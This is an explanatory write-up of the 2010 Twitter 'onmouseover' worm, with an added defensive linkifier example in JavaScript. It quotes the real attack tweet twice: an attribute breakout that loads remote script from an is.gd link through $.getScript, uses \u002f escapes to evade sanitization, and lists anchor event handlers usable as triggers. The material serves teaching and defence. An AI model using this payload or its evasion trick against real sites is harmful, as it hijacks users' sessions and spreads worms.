- How the Twitter "onmouseover" worm (and others ;) works.
- This bug should be called an "input sanitization" bug, not "XSS" and not the "onmouseover bug".
- Usually Twitter sanitizes user input such as <html> tags so it can't change how the page displays or behaves.
- When you tweet a URL on twitter.com, they create the link for you (they wrap it in an <a href> tag).
- But Twitter forgot to sanitize the part of the link after the @ symbol.
- So when you tweet: http://www.google.com/ Twitter renders it like this:
- ################################################
- <a href="http://www.google.com/">
- http://www.google.com/
- </a>
- ################################################
- But when you tweet this:
- http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
- twitter will show like this:
- ################################################
- <a href="http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/">
- http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
- </a>
- ################################################
- So a normal-looking link can become a very dangerous link.
- Notice that you can add a lot of things to a link like this, but I'll explain what this worm does.
- ************************************
- style="font-size:999999999999px;"
- ************************************
- This enlarges the font so the link covers a large area, so users will easily move their mouse over it.
- ************************************************************************
- onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"
- ************************************************************************
- This is the tricky part: twitter.com uses the jQuery JavaScript framework, so the hacker's life becomes much easier.
- The jQuery function .getScript() is used to load external JavaScript from any source,
- and \u002f is the / symbol; this is also a trick to stop Twitter's sanitizer from cleaning it out,
- so the real link of the script is:
- http://is.gd/fl9A7
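- An added example, not code from the original paste or from Twitter: a small linkifier in JavaScript that mirrors the unescaped behaviour described above, next to a hardened version that HTML-escapes the URL inside the href attribute and in the link text, so the quote after @ can no longer terminate the attribute. The sample tweet is constructed and points at example.invalid instead of the real script URL.

```javascript
// Added example (not the original paste's code). Two linkifiers: one that
// mirrors the unescaped behaviour described above, and a hardened one.

// Escape the characters that can break out of an attribute value or text node.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Anything starting with http:// or https:// up to the next whitespace.
const URL_RE = /https?:\/\/\S+/g;

// Unsafe: the matched text is dropped into href="..." verbatim, so a quote
// inside it terminates the attribute and everything after it becomes markup.
function linkifyUnsafe(tweet) {
  return tweet.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

// Hardened: escape the non-URL text, escape the URL in both the attribute and
// the visible text, and only linkify values the URL parser accepts as http(s).
function linkifySafe(tweet) {
  let out = '';
  let last = 0;
  for (const m of tweet.matchAll(URL_RE)) {
    out += escapeHtml(tweet.slice(last, m.index));
    const url = m[0];
    let isHttp = false;
    try {
      const p = new URL(url);
      isHttp = p.protocol === 'http:' || p.protocol === 'https:';
    } catch (e) {
      isHttp = false; // unparseable, e.g. "http://" with no host
    }
    const esc = escapeHtml(url);
    out += isHttp ? `<a href="${esc}">${esc}</a>` : esc;
    last = m.index + url.length;
  }
  return out + escapeHtml(tweet.slice(last));
}

// Constructed sample tweet shaped like the payload above; the script URL is a
// placeholder (example.invalid), not the real one. "\\u002f" keeps the literal
// backslash-u sequence that the tweet text carries.
const SAMPLE_TWEET =
  'http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript(' +
  "'http:\\u002f\\u002fexample.invalid\\u002fworm.js')\"class/";
```

With the unsafe version the output contains a live onmouseover attribute; with the hardened version the whole tweet renders as one inert anchor whose href and text contain only escaped entities.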
- List of JavaScript triggers (event handler attributes) that work on the <a> tag:
- onfocus, onblur, onclick, ondblclick, onmousedown, onmouseup, onmouseover, onmousemove, onmouseout, onkeypress, onkeydown, onkeyup
- Information about jQuery JavaScript Framework:
- jQuery http://docs.jquery.com/Main_Page
- - @anusoft